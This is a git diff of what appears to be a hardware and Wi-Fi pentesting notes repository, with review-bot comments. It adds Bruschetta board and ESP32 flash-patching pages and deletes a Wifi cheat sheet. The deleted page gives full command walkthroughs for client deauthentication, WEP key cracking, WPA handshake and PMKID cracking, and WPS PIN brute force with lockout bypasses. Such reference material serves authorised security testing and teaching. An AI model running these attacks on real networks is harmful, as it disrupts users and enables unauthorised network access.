Wifi - WPA EAP
parent 3e27eb1ea5, commit b118b6412d
@ -87,7 +87,6 @@
|
||||||
|
|
||||||
## Dump Flash via SPI
|
## Dump Flash via SPI
|
||||||
|
|
||||||
|
|
||||||
* Using [flashrom/flashroom](https://github.com/flashrom/flashrom)
|
* Using [flashrom/flashroom](https://github.com/flashrom/flashrom)
|
||||||
```ps1
|
```ps1
|
||||||
sudo apt-get install build-essential pciutils usbutils libpci-dev libusb-dev libftdi1 libftdi-dev zlib1g-dev subversion libusb-1.0-0-dev
|
sudo apt-get install build-essential pciutils usbutils libpci-dev libusb-dev libftdi1 libftdi-dev zlib1g-dev subversion libusb-1.0-0-dev
|
||||||
|
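Review bot: the bullet label reads `flashrom/flashroom` while the URL it points to is `github.com/flashrom/flashrom`; fix the label to `flashrom/flashrom`. In the same hunk the fence around `sudo apt-get install build-essential pciutils usbutils libpci-dev ...` is tagged `ps1`, but that is a Debian/Ubuntu shell line, so tag it `bash` so highlighting and the reader's expectation match. The header shows one line dropped (7 to 6) yet every visible line is unchanged context, so it is not possible to tell from this view what was removed; a word in the commit message would help the next reader.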
@ -213,8 +212,6 @@ $ binwalk -E fw
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Encrypted firmware
|
## Encrypted firmware
|
||||||
|
|
||||||
![](https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/1581004558438-UJV08PX8O5NVAQ6Z8HXI/ke17ZwdGBToddI8pDm48kHSRIhhjdVQ3NosuzDMrTulZw-zPPgdn4jUwVcJE1ZvWQUxwkmyExglNqGp0IvTJZamWLI2zvYWH8K3-s\_4yszcp2ryTI0HqTOaaUohrI8PIYASqlw8FVQsXpiBs096GedrrOfpwzeSClfgzB41Jweo/Picture2.png?format=1000w)
|
![](https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/1581004558438-UJV08PX8O5NVAQ6Z8HXI/ke17ZwdGBToddI8pDm48kHSRIhhjdVQ3NosuzDMrTulZw-zPPgdn4jUwVcJE1ZvWQUxwkmyExglNqGp0IvTJZamWLI2zvYWH8K3-s\_4yszcp2ryTI0HqTOaaUohrI8PIYASqlw8FVQsXpiBs096GedrrOfpwzeSClfgzB41Jweo/Picture2.png?format=1000w)
|
||||||
|
|
|
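Review bot: the `## Encrypted firmware` section consists solely of a hotlinked picture from `images.squarespace-cdn.com` with an empty alt text and no explanatory sentence, so when that third-party link rots the section becomes empty. Since the hunk context is `$ binwalk -E fw` (entropy scan), add one sentence telling the reader what to look for in that output: a flat plateau near 1.0 across the whole image points to encryption or compression, while code and filesystem regions show visible structure and dips. Put a description in the `![]()` alt text and preferably vendor the image into the repository.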
@ -0,0 +1,30 @@
|
||||||
|
# Bruschetta
|
||||||
|
|
||||||
|
![](https://github.com/whid-injector/BRUSCHETTA-board/raw/main/images/Mode%202%20-%20SPI%20and%20I2C.jpg)
|
||||||
|
|
||||||
|
|
||||||
|
## Documentation
|
||||||
|
|
||||||
|
* [whid-injector/BRUSCHETTA-Board](https://github.com/whid-injector/BRUSCHETTA-Board) - The Multi-Protocol Swiss-Army-Knife for Hardware Hackers (UART/JTAG/SPI/I2C)
|
||||||
|
* [whid-injector/PIZZAbite](https://github.com/whid-injector/PIZZAbite) - A cheaper and open-hardware version of the blasoned Sensepeek's PCBite for Hardware Hacking and DIY Hobbyists
|
||||||
|
|
||||||
|
![](https://private-user-images.githubusercontent.com/26245612/270132857-2a87c37b-01fa-427c-87e4-f95feca5f2b6.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.-cCmS3eF-ps8FtJwvRunCnxJS6DedYPc_DirD0Jl3-A)
|
||||||
|
|
||||||
|
Bruschetta is the latest board to interact with Hardware, it is an upgraded version of these projects.
|
||||||
|
|
||||||
|
* [whid-injector/Focaccia-Board](https://github.com/whid-injector/Focaccia-Board) - Multipurpose Breakout for the FT232H
|
||||||
|
* [whid-injector/Burtleina-Board](https://github.com/whid-injector/Burtleina-Board) - Yet another Multipurpose Breakout Board to hack hardware in a clean and easy way
|
||||||
|
* [whid-injector/NANDo-board](https://github.com/whid-injector/NANDo-board) - 2nd Generation of Multipurpose FTDI-based board for Hardware Hacking and IoT Security Testing
|
||||||
|
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
- Mode 2 (UART1+I2C+SPI-VCP): S1=ON and S2=OFF
|
||||||
|
- Mode 4 (UART1+JTAG): S1=ON and S2=ON
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [🍕PIZZAbite & BRUSCHETTA-board: The Hardware Hacking Toolkit you need for your own Lab! 🇮🇹 - WHID - We Hack In Disguise - 28 sept. 2023](https://www.youtube.com/watch?v=r7BOBPbq83M)
|
||||||
|
* [PIZZAbite & BRUSCHETTA-board: The Hardware Hackers tools you need to kickstart your own Lab! - WHID - We Hack In Disguise - SEP 28, 2023](https://www.whid.ninja/blog/pizzabite-bruschetta-board-the-hardware-hackers-tools-you-need-to-kickstart-your-own-lab)
|
||||||
|
* [Hacking IoT & RF Devices with BürtleinaBoard™ - Luca Bongiorni - Jul 27, 2020](https://lucabongiorni.medium.com/hacking-iot-rf-devices-with-bürtleinaboard-165e246b1ed0)
|
|
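Review bot: the second image (`![](https://private-user-images.githubusercontent.com/26245612/270132857-...jpg?jwt=eyJ...)`) is a signed `private-user-images` URL; the embedded JWT is short-lived, so the image will break, and a bearer token is being committed to the repository. Replace it with a permanent asset URL as the first image already does (`.../BRUSCHETTA-board/raw/main/images/...`). Two smaller points: `Bruschetta is the latest board to interact with Hardware, it is an upgraded version of these projects.` is a comma splice introducing the list that follows; rephrase as `Bruschetta is the latest WHID board for interacting with hardware and is an upgraded version of the following projects:`. The Usage section lists only `Mode 2 (UART1+I2C+SPI-VCP): S1=ON and S2=OFF` and `Mode 4 (UART1+JTAG): S1=ON and S2=ON`; either add the missing modes from the board documentation or state that only these two are listed, otherwise the gap in numbering looks like an omission.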
@ -0,0 +1,33 @@
|
||||||
|
# ESP32
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [espressif/esptool](https://github.com/espressif/esptool) - Espressif SoC serial bootloader utility
|
||||||
|
* [jmswrnr/esp32knife](https://github.com/jmswrnr/esp32knife) - Tools for ESP32 firmware dissection
|
||||||
|
|
||||||
|
|
||||||
|
## Flashing
|
||||||
|
|
||||||
|
The ESP32 microprocessor uses the Xtensa instruction set, use `Tensilica Xtensa 32-bit little-endian` in Ghidra.
|
||||||
|
|
||||||
|
* Dump the flash
|
||||||
|
```ps1
|
||||||
|
esptool -p COM7 -b 115200 read_flash 0 0x400000 flash.bin
|
||||||
|
```
|
||||||
|
|
||||||
|
* Dissect the flash
|
||||||
|
```ps1
|
||||||
|
python esp32knife.py --chip=esp32 load_from_file ./flash.bin
|
||||||
|
```
|
||||||
|
|
||||||
|
* Flash the new firmware
|
||||||
|
```ps1
|
||||||
|
# repair the checksum
|
||||||
|
python esp32fix.py --chip=esp32 app_image ./patched.part.3.factory
|
||||||
|
esptool -p COM7 -b 115200 write_flash 0x10000 ./patched.part.3.factory.fixed
|
||||||
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [ESP32-reversing - BlackVS](https://github.com/BlackVS/ESP32-reversing)
|
||||||
|
|
|
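Review bot: the offset in `esptool -p COM7 -b 115200 write_flash 0x10000 ./patched.part.3.factory.fixed` is hardcoded while the filename `part.3.factory` says the image is the third partition; take the offset from the partition table of the dumped flash rather than assuming the default app offset, or a mismatched layout will brick the boot. Likewise `read_flash 0 0x400000 flash.bin` assumes a 4 MB chip; run `esptool -p COM7 flash_id` first and use the reported size. The sentence `The ESP32 microprocessor uses the Xtensa instruction set, use Tensilica Xtensa 32-bit little-endian in Ghidra.` is about disassembly, not flashing, and holds only for the original ESP32 and the S2/S3 (the ESP32-C series is RISC-V); move it under its own heading and scope it. A one-line caveat is also missing: if flash encryption is enabled, the dump is ciphertext, esp32knife will not parse it, and writing a plaintext image back will not boot.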
@ -1,692 +0,0 @@
|
||||||
# Wifi
|
|
||||||
|
|
||||||
### Tools
|
|
||||||
|
|
||||||
* Wifite - https://github.com/derv82/wifite
|
|
||||||
* Wifite2 Rewrite - https://github.com/kimocoder/wifite2
|
|
||||||
* Wifite2 Original - https://github.com/derv82/wifite2
|
|
||||||
|
|
||||||
### Linux Wireless Basics
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
AP_MAC="XX:XX:XX:XX:XX" # BSSID
|
|
||||||
VICTIM_MAC="XX:XX:XX:XX:XX" # VIC
|
|
||||||
ATTACKER_MAC="XX:XX:XX:XX:XX" # MON
|
|
||||||
AP_SSID="wifibox" # ESSID
|
|
||||||
SRC_ADDR="192.168.1.1"
|
|
||||||
DST_ADDR="192.168.1.255"
|
|
||||||
```
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# driver install
|
|
||||||
apt install realtek-rtl88xxau-dkms
|
|
||||||
|
|
||||||
# network card recon
|
|
||||||
iwconfig
|
|
||||||
iw list
|
|
||||||
dmesg | grep 8187 # alfa card
|
|
||||||
|
|
||||||
# Increase Wi-Fi TX Power
|
|
||||||
iw reg set B0
|
|
||||||
iwconfig wlan0 txpower <NmW|NdBm|off|auto> # txpower is 30 (usually)
|
|
||||||
|
|
||||||
# find SSID and channel
|
|
||||||
iw dev wlan0 scan | grep SSID
|
|
||||||
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID"
|
|
||||||
iwlist wlan0 scanning | egrep "ESSID|Channel"
|
|
||||||
|
|
||||||
# monitor mode - start
|
|
||||||
airmon-ng start wlan0
|
|
||||||
airmon-ng start wlan0 3 # only on a particular channel e.g: 3
|
|
||||||
* Manual 1: iw dev wlan0 interface add mon0 type monitor
|
|
||||||
* Manual 2: iwconfig wlan0 mode monitor channel 3
|
|
||||||
ifconfig mon0 up
|
|
||||||
# monitor mode - stop
|
|
||||||
airmon-ng stop mon0
|
|
||||||
* Manual 1: iw dev wlan0 interface del mon0
|
|
||||||
* Manual 2: iwconfig wlan0 mode managed
|
|
||||||
```
|
|
||||||
|
|
||||||
### Aircrack-ng Essentials
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# check and kill processes that could interfere with our monitor mode
|
|
||||||
airmon-ng check
|
|
||||||
airmon-ng check kill
|
|
||||||
# pkill dhclient; pkill wpa_supplicant; pkill dhclient3
|
|
||||||
|
|
||||||
# list AP
|
|
||||||
airodump-ng mon0
|
|
||||||
airodump-ng mon0 -c 3 # only on a particular channel e.g: 3
|
|
||||||
airodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic
|
|
||||||
|
|
||||||
# get our macaddress
|
|
||||||
macchanger -s mon0
|
|
||||||
macchanger --show mon0
|
|
||||||
|
|
||||||
# replay and accelerate traffic
|
|
||||||
aireplay-ng
|
|
||||||
* -i interface
|
|
||||||
* -r file.pcap
|
|
||||||
|
|
||||||
# check aireplay card compatibility
|
|
||||||
aireplay-ng -9 mon0 -> test injection
|
|
||||||
aireplay-ng -9 -i wlan1 mon0 -> test card to card injection
|
|
||||||
|
|
||||||
# injection rate
|
|
||||||
iwconfig wlan0 rate 1M
|
|
||||||
|
|
||||||
# Aircrack compatibility
|
|
||||||
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters
|
|
||||||
Alfa AWUS036H / TPLink WN722
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Fake authentication attack
|
|
||||||
|
|
||||||
:warning: use it before each attack
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0
|
|
||||||
|
|
||||||
# fake authentication = no arp
|
|
||||||
aireplay-ng -1 0 -e AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
* Might need a real $ATTACKER_MAC, observe traffic using airodump
|
|
||||||
> Association successful! :-)
|
|
||||||
|
|
||||||
# fake authentication for picky AP
|
|
||||||
# Send keep-alive packets every 10 seconds
|
|
||||||
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
|
|
||||||
|
|
||||||
# might need to fake your MAC ADDRESS first
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Deauthentication attack
|
|
||||||
|
|
||||||
> Force ARP packet to be sent.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
* -0 : 1 deauthentication, 0 unlimited
|
|
||||||
> Sending 64 directed DeAuth.
|
|
||||||
```
|
|
||||||
|
|
||||||
#### ARP Replay Attack
|
|
||||||
|
|
||||||
Video: wifu-20.mp4 The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
* ATTACKER_MAC if fake authentication launched
|
|
||||||
* CONNECTED_MAC if a client is associated
|
|
||||||
|
|
||||||
# –x 1000 –n 1000 ?
|
|
||||||
# aireplay-ng -3 –x 1000 –n 1000 –b $AP_MAC -h $ATTACKER_MAC wlan0mon
|
|
||||||
# wait for ARP on the network
|
|
||||||
# alternatively you can de-auth some clients
|
|
||||||
|
|
||||||
aircrack-ng –b <BSSID> <PCAP_of_FileName>
|
|
||||||
aircrack-ng -0 wep1.cap
|
|
||||||
* -0 : colored output
|
|
||||||
```
|
|
||||||
|
|
||||||
### Cracking WEP via a Client
|
|
||||||
|
|
||||||
#### ARP Request Replay Attack
|
|
||||||
|
|
||||||
> Attack the ACCESS POINT
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic
|
|
||||||
|
|
||||||
# Fake authentication for a more reliable attack
|
|
||||||
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# ARP replay attack
|
|
||||||
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# Deauthentication
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
|
|
||||||
# Cracking
|
|
||||||
aircrack-ng arpreplay.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Interactive replay attack
|
|
||||||
|
|
||||||
> Attack a client to force new packets 0841 attack, or interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic
|
|
||||||
|
|
||||||
# fake authentication for a more reliable attack
|
|
||||||
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# interactive replay attack (min arp 68, max arp 86)
|
|
||||||
aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet
|
|
||||||
aireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0 # interactive - force create a packet
|
|
||||||
# Packet selection (ARP packets met the characteristics):
|
|
||||||
# - APs will always repeat packets destined to the broadcast
|
|
||||||
# - The packet will have the ToDS (To Distribution System) bit set to 1
|
|
||||||
# answer "y" multiple times
|
|
||||||
|
|
||||||
# cracking require ~> 250000 IVs
|
|
||||||
aircrack-ng -0 -z -n 64 clientwep-01.cap
|
|
||||||
* -z: PTW attack
|
|
||||||
* -n: number of bits in the WEP key
|
|
||||||
|
|
||||||
# backup file with an ARP packet
|
|
||||||
aireplay-ng -2 -r replay.cap mon0
|
|
||||||
```
|
|
||||||
|
|
||||||
### Cracking WEP without a Client
|
|
||||||
|
|
||||||
* Chopchop & Fragmentation attack => PRGA, generate more packets with weak IVs
|
|
||||||
* Need an AP configured with open system authentication
|
|
||||||
|
|
||||||
Prerequisite:
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# put into monitor mode on our desired channel
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no client
|
|
||||||
|
|
||||||
# fake authentication attack with association timing (every 60s try to reassociate)
|
|
||||||
aireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump
|
|
||||||
# -1 6000 to avoid a time out.
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Fragmentation attack
|
|
||||||
|
|
||||||
> Goal: 1500 bytes of PRGA Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# attacker mac must be associated (fake auth)
|
|
||||||
# Press "Y"
|
|
||||||
aireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# use our PRGA from the fragmentation attack to generate an ARP request
|
|
||||||
# SRC_ADDR: 192.168.1.100
|
|
||||||
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
|
|
||||||
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap
|
|
||||||
# -k: the destination IP i.e. in ARP, this is "Who has this IP"
|
|
||||||
# -l: the source IP i.e. in ARP, this is "Tell this IP"
|
|
||||||
|
|
||||||
# check the packet
|
|
||||||
tcpdump -n -vvv -e -s0 -r inject.cap
|
|
||||||
|
|
||||||
# inject our crafted packet
|
|
||||||
aireplay-ng -2 -r inject.cap mon0
|
|
||||||
|
|
||||||
# crack the WEP key
|
|
||||||
# Aircrack-ng will auto-update when new IVs are available
|
|
||||||
aircrack-ng -0 wepcrack
|
|
||||||
|
|
||||||
# if 64-bit WEP is used, cracking time < 5 minutes
|
|
||||||
# switch to 128-bit keys after 600000 IVs
|
|
||||||
# use the `-f 4` after 2000000
|
|
||||||
aircrack-ng -n 64 <capture filename>
|
|
||||||
```
|
|
||||||
|
|
||||||
#### KoreK Chopchop attack
|
|
||||||
|
|
||||||
> Can't be used for every AP, might work when fragmentation fails Much slower than the fragmentation attack
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# chopchop attack: -4
|
|
||||||
# out decrypted: .cap
|
|
||||||
# out prga: .xor
|
|
||||||
# Press "Y" (choose a small packet)
|
|
||||||
aireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# check the packet and find the network addresses
|
|
||||||
tcpdump -n -vvv -e -s0 -r inject.cap
|
|
||||||
|
|
||||||
# use our PRGA from the fragmentation attack
|
|
||||||
# SRC_ADDR: 192.168.1.100
|
|
||||||
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
|
|
||||||
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chochop_out.cap
|
|
||||||
|
|
||||||
# inject our crafted packet
|
|
||||||
aireplay-ng -2 -r chochop_out.cap mon0
|
|
||||||
|
|
||||||
# crack the WEP key
|
|
||||||
aircrack-ng -0 wepcrack
|
|
||||||
```
|
|
||||||
|
|
||||||
### Bypassing WEP Shared Key Authentication SKA
|
|
||||||
|
|
||||||
> By default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication.
|
|
||||||
|
|
||||||
Prerequisite:
|
|
||||||
|
|
||||||
* Authentication: Shared Key
|
|
||||||
* When Fake Authentication => `AP rejects open-system authentication`
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# put into monitor mode on our desired channel
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0
|
|
||||||
|
|
||||||
# deauthentication attack on the connected client
|
|
||||||
# airodump should display SKA under the AUTH column
|
|
||||||
# PRGA file will be saved as xxxx.xor
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
# TO CHECK aireplay-ng -0 10 –a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
|
|
||||||
# fake authentication attack with association timing (every 60s try to reassociate)
|
|
||||||
# should display switching to Shared Key Authentication
|
|
||||||
# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long
|
|
||||||
# If you have "Part2: Association Not answering...(Step3)" -> spoof the mac address used to fake auth
|
|
||||||
aireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# ARP replay attack
|
|
||||||
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# deauthentication attack on the connected client
|
|
||||||
# speed the ARP attack process using deauth
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
# TO CHECK: aireplay-ng –-deauth 1 –a $AP_MAC -h <FakedMac> wlan0mon
|
|
||||||
|
|
||||||
# crack the WEP key
|
|
||||||
aircrack-ng sharedkey.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
### Cracking WPA PSK
|
|
||||||
|
|
||||||
#### Cracking WPA with John the Ripper
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# put into monitor mode on our desired channel
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w wpajohn mon0 # see no client
|
|
||||||
|
|
||||||
# deauthentication to get the WPA handshake (Sniffing should show the 4-way handshake)
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
|
|
||||||
# crack without john the ripper (-b <BSSID>)
|
|
||||||
aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap
|
|
||||||
aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap
|
|
||||||
aircrack-ng -w password.lst,secondlist.txt wpajohn-01.cap # multiple dicts
|
|
||||||
|
|
||||||
# crack with john the ripper - combine mangling rules with aircrack
|
|
||||||
# rules example to add in /pentest/passwords/john/john.conf
|
|
||||||
# $[0-9]$[0-9]
|
|
||||||
# $[0-9]$[0-9]$[0-9]
|
|
||||||
john --wordlist=/pentest/wireless/aircrack-ng/test/password.lst --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - /root/wpajohn
|
|
||||||
|
|
||||||
# generate PMKs for a faster cracking - Precomputed WPA Keys Database Attack
|
|
||||||
echo wifu > essid.txt
|
|
||||||
airolib-ng test.db --import essid essid.txt
|
|
||||||
airolib-ng test.db --stats
|
|
||||||
airolib-ng test.db --import passwd /pentest/passwords/john/password.lst
|
|
||||||
airolib-ng test.db --batch
|
|
||||||
airolib-ng test.db --stats
|
|
||||||
aircrack-ng -r test.db wpajohn-01.cap
|
|
||||||
# airolib-ng test.db --clean all
|
|
||||||
|
|
||||||
# Not in lab - Convert to hccap to use with John Jumbo
|
|
||||||
aircrack-ng <FileName>.cap -J <outFile>
|
|
||||||
hccap2john <outFile>.hccap > <JohnOutFile>
|
|
||||||
john <JohnOutFile>
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Cracking WPA with coWPAtty
|
|
||||||
|
|
||||||
> Better for PMK Rainbow table attacks
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# put into monitor mode on our desired channel
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w wpacow mon0 # see no client
|
|
||||||
|
|
||||||
# deauthentication to get the WPA handshake
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
|
|
||||||
# coWPAtty dictionary mode (slow)
|
|
||||||
cowpatty -r wpacow-01.cap -f /pentest/passwords/john/password.lst -2 -s $AP_SSID
|
|
||||||
|
|
||||||
# coWPAtty rainbow table mode (fast)
|
|
||||||
genpmk -f /pentest/passwords/john/password.lst -d wifuhashes -s $AP_SSID
|
|
||||||
cowpatty -r wpacow-01.cap -d wifuhashes -2 -s $AP_SSID
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Cracking WPA with Pyrit
|
|
||||||
|
|
||||||
> Can use GPU
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# put into monitor mode on our desired channel
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w wpapyrit mon0 # see no client
|
|
||||||
|
|
||||||
# deauthentication to get the WPA handshake
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
|
|
||||||
# clean the cap and extract only good packets
|
|
||||||
pyrit -r wpapyrit-01.cap analyze
|
|
||||||
pyrit -r wpapyrit-01.cap -o wpastripped.cap strip
|
|
||||||
|
|
||||||
# dictionary attack - slow ++
|
|
||||||
pyrit -r wpapyrit-01.cap -i /pentest/passwords/john/password.lst -b $AP_MAC attack_passthrough
|
|
||||||
|
|
||||||
# pre-computed hashes attack - slow on CPU
|
|
||||||
pyrit eval # pwds in database
|
|
||||||
pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database
|
|
||||||
pyrit -e $AP_SSID create_essid
|
|
||||||
pyrit batch # generate
|
|
||||||
pyrit -r wpastripped.cap attack_db
|
|
||||||
|
|
||||||
# gpu power attack - fast on GPU
|
|
||||||
pyrit list_cores
|
|
||||||
pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database
|
|
||||||
pyrit -e $AP_SSID create_essid
|
|
||||||
pyrit batch
|
|
||||||
pyrit -r wpastripped.cap attack_db
|
|
||||||
```
|
|
||||||
|
|
||||||
#### WPA WPS Attack
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0
|
|
||||||
airodump-ng mon0
|
|
||||||
|
|
||||||
# Install
|
|
||||||
apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps
|
|
||||||
git clone https://github.com/t6x/reaver-wps-fork-t6x
|
|
||||||
apt-get install reaver
|
|
||||||
|
|
||||||
# Reaver integrated dumping tool (can also airodump-ng)
|
|
||||||
# Wash gives information about WPS being locked or not
|
|
||||||
# Locked WPS will have less success chances
|
|
||||||
wash -i mon0
|
|
||||||
|
|
||||||
# Launch Reaver
|
|
||||||
reaver -i mon0 -b $AP_MAC -vv -S
|
|
||||||
reaver -i mon0 -c <Channel> -b $AP_MAC -p <PinCode> -vv -S
|
|
||||||
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv
|
|
||||||
|
|
||||||
|
|
||||||
# Now using pixiexps, you can crack PIN offline
|
|
||||||
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
|
|
||||||
# Then, you can use the PIN with reaver to get to cleartext password
|
|
||||||
reaver -i <monitor interface> -b <bssid> -c <channel> -p <PIN>
|
|
||||||
|
|
||||||
|
|
||||||
# Some manufacturers have implemented protections
|
|
||||||
# You can try different switches to bypass
|
|
||||||
# -L = Ignore locked state
|
|
||||||
# -N = Don't send NACK packets when errors are detected
|
|
||||||
# -d = delay X seconds between PIN attempts
|
|
||||||
# -T = set timeout period to X second (.5 means half second)
|
|
||||||
# -r = After X attemps, sleep for Y seconds
|
|
||||||
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15
|
|
||||||
```
|
|
||||||
|
|
||||||
> Message "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying" -> AP is protected Message "WARNING: Receive timeout occured" -> AP is too far
|
|
||||||
|
|
||||||
#### WPA PMKID Attack
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
INTERFACE=$(ifconfig | grep wlp | cut -d":" -f1) # mon0
|
|
||||||
|
|
||||||
# PMKID capture
|
|
||||||
# Note: Based on the noise on the wifi channel it can take some time to receive the PMKID.
|
|
||||||
# It can take a while to capture PKMID (several minutes++)
|
|
||||||
# We recommend running hcxdumptool up to 10 minutes before aborting.
|
|
||||||
# If an AP recieves our association request packet and supports sending
|
|
||||||
# sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1
|
|
||||||
PMKID=$(sudo hcxdumptool -o test.pcapng -i $INTERFACE --enable_status --filtermode=2)
|
|
||||||
echo $PMKID|grep 'FOUND PMKID' &> /dev/null
|
|
||||||
hcxpcaptool -z test.16800 test.pcapng
|
|
||||||
|
|
||||||
# Then convert the captured data to a suitable format for hashcat
|
|
||||||
# -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
|
|
||||||
# -I retrieve identities from WiFi-traffic
|
|
||||||
# -U retrieve usernames from WiFi-traffic
|
|
||||||
# PMKID*MAC AP*MAC Station*ESSID
|
|
||||||
# 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
|
|
||||||
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
|
|
||||||
|
|
||||||
# Cracking the HASH
|
|
||||||
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
|
|
||||||
hashcat -m 16800 -d 1 -w 3 myHashes rockyou.txt
|
|
||||||
|
|
||||||
# Check clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR
|
|
||||||
```
|
|
||||||
|
|
||||||
